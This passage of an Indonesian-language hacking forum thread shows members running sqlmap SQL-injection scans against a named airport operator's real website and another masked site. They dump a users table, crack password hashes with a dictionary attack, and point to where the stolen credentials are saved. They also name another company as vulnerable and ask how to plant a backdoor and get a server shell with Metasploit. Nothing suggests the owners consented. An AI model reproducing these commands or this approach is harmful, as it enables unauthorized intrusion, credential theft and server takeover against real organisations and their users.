SQLi Sqlmap.py
#51
yang pertama ato yang kedua sama aja om kaya gini hasilnya
Code:
[email protected]:/pentest/database/sqlmap# python sqlmap.py -u http://www.angkasapura2.co.id/cabang/index.php?id=001 --random-agent --threads 10 --banner

    sqlmap/1.0-dev (r4850) - automatic SQL injection and database takeover tool
    http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 23:33:30

[23:33:30] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.1 Safari/532.0
[23:33:30] [INFO] using '/pentest/database/sqlmap/output/www.angkasapura2.co.id/session' as session file
[23:33:31] [INFO] testing connection to the target url
[23:33:34] [INFO] testing if the url is stable, wait a few seconds
[23:33:37] [INFO] url is stable
[23:33:37] [INFO] testing if GET parameter 'id' is dynamic
[23:33:41] [INFO] confirming that GET parameter 'id' is dynamic
[23:33:43] [INFO] GET parameter 'id' is dynamic
[23:33:46] [WARNING] heuristic test shows that GET parameter 'id' might not be injectable
[23:33:46] [INFO] testing sql injection on GET parameter 'id'
[23:33:46] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:33:55] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[23:33:57] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[23:34:01] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[23:34:04] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[23:34:06] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[23:34:09] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[23:34:13] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[23:34:16] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[23:34:22] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[23:34:24] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[23:34:28] [INFO] testing 'Oracle AND time-based blind'
[23:34:32] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[23:35:18] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[23:35:18] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using the --dbms option
[23:35:59] [WARNING] GET parameter 'id' is not injectable
[23:35:59] [CRITICAL] all parameters appear to be not injectable. Try to increase --level/--risk values to perform more tests. Also, you can try to rerun by providing either a valid --string or a valid --regexp, refer to the user's manual for details

[*] shutting down at 23:35:59

[email protected]:/pentest/database/sqlmap#

bikin pusing+sakit jiwa[/code]
yang pertama ato yang kedua sama aja om kaya gini hasilnya
Code:
[email protected]:/pentest/database/sqlmap# python sqlmap.py -u http://www.angkasapura2.co.id/cabang/index.php?id=001 --random-agent --threads 10 --banner

    sqlmap/1.0-dev (r4850) - automatic SQL injection and database takeover tool
    http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 23:33:30

[23:33:30] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.1 Safari/532.0
[23:33:30] [INFO] using '/pentest/database/sqlmap/output/www.angkasapura2.co.id/session' as session file
[23:33:31] [INFO] testing connection to the target url
[23:33:34] [INFO] testing if the url is stable, wait a few seconds
[23:33:37] [INFO] url is stable
[23:33:37] [INFO] testing if GET parameter 'id' is dynamic
[23:33:41] [INFO] confirming that GET parameter 'id' is dynamic
[23:33:43] [INFO] GET parameter 'id' is dynamic
[23:33:46] [WARNING] heuristic test shows that GET parameter 'id' might not be injectable
[23:33:46] [INFO] testing sql injection on GET parameter 'id'
[23:33:46] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:33:55] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[23:33:57] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[23:34:01] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[23:34:04] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[23:34:06] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[23:34:09] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[23:34:13] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[23:34:16] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[23:34:22] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[23:34:24] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[23:34:28] [INFO] testing 'Oracle AND time-based blind'
[23:34:32] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[23:35:18] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[23:35:18] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using the --dbms option
[23:35:59] [WARNING] GET parameter 'id' is not injectable
[23:35:59] [CRITICAL] all parameters appear to be not injectable. Try to increase --level/--risk values to perform more tests. Also, you can try to rerun by providing either a valid --string or a valid --regexp, refer to the user's manual for details

[*] shutting down at 23:35:59

[email protected]:/pentest/database/sqlmap#

bikin pusing+sakit jiwa
<< back|track'ers newbee

#52
om mau tanya dong punya saya waktu pake
python sqlmap.py -u http://www.xxxx.com/features/shows.php?user=11 -D xxxx -T users --dump

langsung keluar kaya gini :

Quote:[10:06:10] [INFO] analyzing table dump for possible password hashes
recognized possible password hashes in column 'user_actkey'. Do you want to crack them via a dictionary-based attack? [Y/n/q] y
[10:06:20] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/pentest/database/sqlmap/txt/wordlist.txt' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[10:06:26] [INFO] using default dictionary
[10:06:26] [INFO] loading dictionary from '/pentest/database/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] y
[10:06:29] [INFO] starting dictionary-based cracking (md5_generic_passwd)

itu artinya sqlmap nya lagi decrypt ya om?
terus hasilnya bisa di lihat dimana ya??

#53
ntu kayaknya angkasapura udah dipatch vuln nya om....
hahahahhaha..
ane juga udah pernah nyoba... eh... sama aja ga bisa...
ckckckckck
mungkin om zee or om konspirasi bisa jelasin..
ckckckckckkc

#54
angkasapura udah di coba bisa om..
yg itu ane salah inject akwkaw
<< back|track'ers newbee

#55
(03-14-2012, 11:39 AM)xombix Wrote: om mau tanya dong punya saya waktu pake
python sqlmap.py -u http://www.xxxx.com/features/shows.php?user=11 -D xxxx -T users --dump

langsung keluar kaya gini :

Quote:[10:06:10] [INFO] analyzing table dump for possible password hashes
recognized possible password hashes in column 'user_actkey'. Do you want to crack them via a dictionary-based attack? [Y/n/q] y
[10:06:20] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/pentest/database/sqlmap/txt/wordlist.txt' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[10:06:26] [INFO] using default dictionary
[10:06:26] [INFO] loading dictionary from '/pentest/database/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] y
[10:06:29] [INFO] starting dictionary-based cracking (md5_generic_passwd)

itu artinya sqlmap nya lagi decrypt ya om?
terus hasilnya bisa di lihat dimana ya??
iya itu mnta persetujuan untuk decrypt,,nah nanti dilayar ditampilkan
misal kayak gini
username | password
admin | 098gf9807450459445fgnjf873f(admin)

berarrti admin itu crackkan md5nya

terus nanti dismpan salm format .csv di folder
misal url www.target.com
maka
sqlmap > output> www.target.com> dump>tbl_user.csv

injectkan yang bener yang mana om fake666

#56
(03-19-2012, 08:57 PM)fake666 Wrote: angkasapura udah di coba bisa om..
yg itu ane salah inject akwkaw

injectnya yang bener gimana om????
ajarin dong... ckckckkcAngry


#57
jeh udah di ubah tuh webnya ==
<< back|track'ers newbee

#58
wkwkkw emng udah diubah,,mending garuda ada tuh vulnernya Big Grin

#59
oh ya om..
katanya lewat sql injection kita bisa upload backdoor dan dapetin shell servernya
ada yang tau caranya gak??
<< back|track'ers newbee

#60
bisa,,kita juga bisa interaksi sama osnya Tongue

itu lagi ane dalemin,,ntar sqlmap nya kerja sama dengan metasploit Smile
malam ya kita diskus,,ini lagi di windus,,ntar malam kita diskus msalah ini sip???






Users browsing this thread: 2 Guest(s)